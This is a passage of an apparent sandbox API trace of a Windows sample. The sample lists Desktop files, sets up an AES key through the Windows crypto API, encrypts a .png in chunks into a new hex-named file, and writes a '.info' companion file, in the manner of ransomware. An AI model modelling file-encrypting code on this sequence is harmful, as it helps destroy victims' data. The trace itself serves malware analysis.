(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.679] GetFileType (hFile=0x398) returned 0x1 [0070.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0070.679] GetFileType (hFile=0x398) returned 0x1 [0070.679] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0070.679] CloseHandle (hObject=0x398) returned 1 [0070.680] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A", lpFilePart=0x0) returned 0x46 [0070.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0070.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BEEBCAF45CB24EB19B5DCF36A3672D5A" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\beebcaf45cb24eb19b5dcf36a3672d5a"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.680] GetFileType (hFile=0x398) returned 0x1 [0070.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0070.680] GetFileType (hFile=0x398) returned 0x1 [0070.680] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0070.680] CloseHandle (hObject=0x398) returned 1 [0070.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0070.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG", lpFilePart=0x0) returned 0x2f [0070.714] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\", lpFilePart=0x0) returned 0x30 [0070.714] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0070.715] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.715] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbac8d470, ftCreationTime.dwHighDateTime=0x1d4c811, ftLastAccessTime.dwLowDateTime=0x4c31df90, ftLastAccessTime.dwHighDateTime=0x1d4cd7d, ftLastWriteTime.dwLowDateTime=0x4c31df90, ftLastWriteTime.dwHighDateTime=0x1d4cd7d, nFileSizeHigh=0x0, nFileSizeLow=0x1594a, dwReserved0=0x0, dwReserved1=0x0, cFileName="DKy3Q8woBxC NmAkC5D.png", cAlternateFileName="DKY3Q8~1.PNG")) returned 1 [0070.715] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd14180, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x22308550, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0x22308550, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xf41, dwReserved0=0x0, dwReserved1=0x0, cFileName="JESejqUeIyXIob-ZgE6.odt", cAlternateFileName="JESEJQ~1.ODT")) returned 1 [0070.715] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0070.715] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0070.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0070.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0070.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0070.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG", lpFilePart=0x0) returned 0x2f [0070.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\", lpFilePart=0x0) returned 0x30 [0070.716] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0070.716] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ec8b30, ftCreationTime.dwHighDateTime=0x1d4c8dd, ftLastAccessTime.dwLowDateTime=0x3ba72070, ftLastAccessTime.dwHighDateTime=0x1d4d1a3, ftLastWriteTime.dwLowDateTime=0x3ba72070, ftLastWriteTime.dwHighDateTime=0x1d4d1a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.716] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbac8d470, ftCreationTime.dwHighDateTime=0x1d4c811, ftLastAccessTime.dwLowDateTime=0x4c31df90, ftLastAccessTime.dwHighDateTime=0x1d4cd7d, ftLastWriteTime.dwLowDateTime=0x4c31df90, ftLastWriteTime.dwHighDateTime=0x1d4cd7d, nFileSizeHigh=0x0, nFileSizeLow=0x1594a, dwReserved0=0x0, dwReserved1=0x0, cFileName="DKy3Q8woBxC NmAkC5D.png", cAlternateFileName="DKY3Q8~1.PNG")) returned 1 [0070.716] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd14180, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x22308550, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0x22308550, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xf41, dwReserved0=0x0, dwReserved1=0x0, cFileName="JESejqUeIyXIob-ZgE6.odt", cAlternateFileName="JESEJQ~1.ODT")) returned 1 [0070.716] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd14180, ftCreationTime.dwHighDateTime=0x1d4c5e2, ftLastAccessTime.dwLowDateTime=0x22308550, ftLastAccessTime.dwHighDateTime=0x1d4c9f6, ftLastWriteTime.dwLowDateTime=0x22308550, ftLastWriteTime.dwHighDateTime=0x1d4c9f6, nFileSizeHigh=0x0, nFileSizeLow=0xf41, dwReserved0=0x0, dwReserved1=0x0, cFileName="JESejqUeIyXIob-ZgE6.odt", cAlternateFileName="JESEJQ~1.ODT")) returned 0 [0070.716] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0070.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0070.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0070.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.718] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b7510) returned 1 [0070.719] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x218f018, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626bb0) returned 1 [0070.719] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.719] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0070.719] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x218f108, pdwDataLen=0x1bf5d230 | out: pbData=0x218f108*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0070.719] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x218f228, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0070.719] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.719] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.719] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a6269f0) returned 1 [0070.719] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.719] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x4, pbData=0x218f370*=0x1, dwFlags=0x0) returned 1 [0070.719] CryptSetKeyParam (hKey=0x1a6269f0, dwParam=0x1, pbData=0x218f320, dwFlags=0x0) returned 1 [0070.719] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0070.719] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0070.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png", lpFilePart=0x0) returned 0x47 [0070.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0070.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\DKy3Q8woBxC NmAkC5D.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\dky3q8wobxc nmakc5d.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.720] GetFileType (hFile=0x384) returned 0x1 [0070.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0070.720] GetFileType (hFile=0x384) returned 0x1 [0070.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", lpFilePart=0x0) returned 0x50 [0070.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0070.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x300 [0070.809] GetFileType (hFile=0x300) returned 0x1 [0070.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0070.809] GetFileType (hFile=0x300) returned 0x1 [0070.809] ReadFile (in: hFile=0x384, lpBuffer=0x21b9b90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21b9b90*, lpNumberOfBytesRead=0x1bf5d128*=0x14000, lpOverlapped=0x0) returned 1 [0070.810] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21cdba8*, pdwDataLen=0x1bf5d180*=0x14000, dwBufLen=0x14000 | out: pbData=0x21cdba8*, pdwDataLen=0x1bf5d180*=0x14000) returned 1 [0070.811] WriteFile (in: hFile=0x300, lpBuffer=0x21cdba8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x21cdba8*, lpNumberOfBytesWritten=0x1bf5d118*=0x14000, lpOverlapped=0x0) returned 1 [0070.813] ReadFile (in: hFile=0x384, lpBuffer=0x21b9b90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21b9b90*, lpNumberOfBytesRead=0x1bf5d128*=0x194a, lpOverlapped=0x0) returned 1 [0070.813] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21e1be8*, pdwDataLen=0x1bf5d180*=0x1940, dwBufLen=0x1940 | out: pbData=0x21e1be8*, pdwDataLen=0x1bf5d180*=0x1940) returned 1 [0070.813] WriteFile (in: hFile=0x300, lpBuffer=0x21e1be8*, nNumberOfBytesToWrite=0x1940, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x21e1be8*, lpNumberOfBytesWritten=0x1bf5d118*=0x1940, lpOverlapped=0x0) returned 1 [0070.813] ReadFile (in: hFile=0x384, lpBuffer=0x21b9b90, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x21b9b90*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0070.813] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x21e3568*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x21e3568*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0070.813] CryptEncrypt (in: hKey=0x1a6269f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21e35b8*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x21e35b8*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0070.814] WriteFile (in: hFile=0x300, lpBuffer=0x21e3608*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x21e3608*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0070.814] CloseHandle (hObject=0x300) returned 1 [0070.815] CloseHandle (hObject=0x384) returned 1 [0070.815] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0070.815] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0070.815] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0070.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701", lpFilePart=0x0) returned 0x50 [0070.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0070.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.815] GetFileType (hFile=0x384) returned 0x1 [0070.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0070.816] GetFileType (hFile=0x384) returned 0x1 [0070.816] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.817] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.818] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.819] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.820] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.820] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.820] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.820] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.821] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x950, lpOverlapped=0x0) returned 1 [0070.822] ReadFile (in: hFile=0x384, lpBuffer=0x21e4d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x21e4d10*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0070.822] CloseHandle (hObject=0x384) returned 1 [0070.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701.info", lpFilePart=0x0) returned 0x55 [0070.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0070.824] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OoP6PKriG\\81CABD95083BDA1463F62818BFBCB701.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oop6pkrig\\81cabd95083bda1463f62818bfbcb701.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.825] GetFileType (hFile=0x384) returned 0x1 [0070.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0070.825] GetFileType (hFile=0x384) returned 0x1 [0070.825] WriteFile (in: hFile=0x384, lpBuffer=0x21f13e8*, nNumberOfBytesToWrite=0x77d, 